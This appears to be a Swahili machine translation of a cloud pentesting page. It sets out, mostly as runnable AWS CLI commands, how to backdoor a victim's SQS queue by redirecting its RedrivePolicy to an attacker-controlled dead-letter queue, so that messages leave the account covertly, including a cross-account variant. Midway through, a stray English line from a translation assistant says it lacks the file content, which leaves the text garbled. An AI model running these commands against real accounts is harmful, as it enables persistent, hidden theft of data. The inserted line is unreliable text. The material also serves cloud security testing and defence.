AWS - SQS DLQ Backdoor Persistence via RedrivePolicy/RedriveAllowPolicy

Reading time: 4 minutes

Abusa SQS Dead-Letter Queues (DLQs) ili kunyonya data kwa siri kutoka kwenye queue ya chanzo ya mwathiriwa kwa kuelekeza RedrivePolicy yake kwenye queue inayodhibitiwa na mshambuliaji. Kwa maxReceiveCount ndogo na kwa kuchochea au kusubiri kushindwa kwa usindikaji wa kawaida, ujumbe unaelekezwa moja kwa moja kwenye DLQ ya mshambuliaji bila kubadilisha producers au Lambda event source mappings.

Ruhusa Zilizotumiwa Vibaya

• sqs:SetQueueAttributes kwenye queue ya chanzo ya mwathiriwa (kuweka RedrivePolicy)
• sqs:SetQueueAttributes kwenye DLQ ya mshambuliaji (kuweka RedriveAllowPolicy)
• Hiari kwa kuharakisha: sqs:ReceiveMessage kwenye queue ya chanzo
• Hiari kwa maandalizi: sqs:CreateQueue, sqs:SendMessage

Mtiririko wa Akaunti Ile Ile (allowAll)

Maandalizi (akaunti ya mshambuliaji au principal aliyevamiwa):

REGION=us-east-1
# 1) Create attacker DLQ
ATTACKER_DLQ_URL=$(aws sqs create-queue --queue-name ht-attacker-dlq --region $REGION --query QueueUrl --output text)
ATTACKER_DLQ_ARN=$(aws sqs get-queue-attributes --queue-url "$ATTACKER_DLQ_URL" --region $REGION --attribute-names QueueArn --query Attributes.QueueArn --output text)

# 2) Allow any same-account source queue to use this DLQ
aws sqs set-queue-attributes \
--queue-url "$ATTACKER_DLQ_URL" --region $REGION \
--attributes '{"RedriveAllowPolicy":"{\"redrivePermission\":\"allowAll\"}"}'

Utekelezaji (endesha kama principal aliyevamiwa katika akaunti ya mwathiriwa):

# 3) Point victim source queue to attacker DLQ with low retries
VICTIM_SRC_URL=<victim source queue url>
ATTACKER_DLQ_ARN=<attacker dlq arn>
aws sqs set-queue-attributes \
--queue-url "$VICTIM_SRC_URL" --region $REGION \
--attributes '{"RedrivePolicy":"{\"deadLetterTargetArn\":\"'"$ATTACKER_DLQ_ARN"'\",\"maxReceiveCount\":\"1\"}"}'

Kuongeza kasi (hiari):

# 4) If you also have sqs:ReceiveMessage on the source queue, force failures
for i in {1..2}; do \
aws sqs receive-message --queue-url "$VICTIM_SRC_URL" --region $REGION \
--max-number-of-messages 10 --visibility-timeout 0; \
done

I don't have the file content. Please paste the markdown from src/pentesting-cloud/aws-security/aws-persistence/aws-sqs-persistence/aws-sqs-dlq-backdoor-persistence.md and I will translate the relevant English text to Swahili following the rules.

# 5) Confirm messages appear in attacker DLQ
aws sqs receive-message --queue-url "$ATTACKER_DLQ_URL" --region $REGION \
--max-number-of-messages 10 --attribute-names All --message-attribute-names All

Mfano wa ushahidi (Vigezo vinajumuisha DeadLetterQueueSourceArn):

{
"MessageId": "...",
"Body": "...",
"Attributes": {
"DeadLetterQueueSourceArn": "arn:aws:sqs:REGION:ACCOUNT_ID:ht-victim-src-..."
}
}

Cross-Account Variant (byQueue)

Weka RedriveAllowPolicy kwenye attacker DLQ ili kuruhusu tu ARNs maalum za source queue za victim:

VICTIM_SRC_ARN=<victim source queue arn>
aws sqs set-queue-attributes \
--queue-url "$ATTACKER_DLQ_URL" --region $REGION \
--attributes '{"RedriveAllowPolicy":"{\"redrivePermission\":\"byQueue\",\"sourceQueueArns\":[\"'"$VICTIM_SRC_ARN"'\"]}"}'

Madhara

• Data exfiltration/persistence kwa siri na kwa kudumu kwa kupeleka kiotomatiki ujumbe ulioshindwa kutoka kwenye SQS source queue ya mwathirika hadi DLQ inayodhibitiwa na mshambuliaji, na kusababisha kelele ndogo ya kiutendaji na bila mabadiliko kwa producers au Lambda mappings.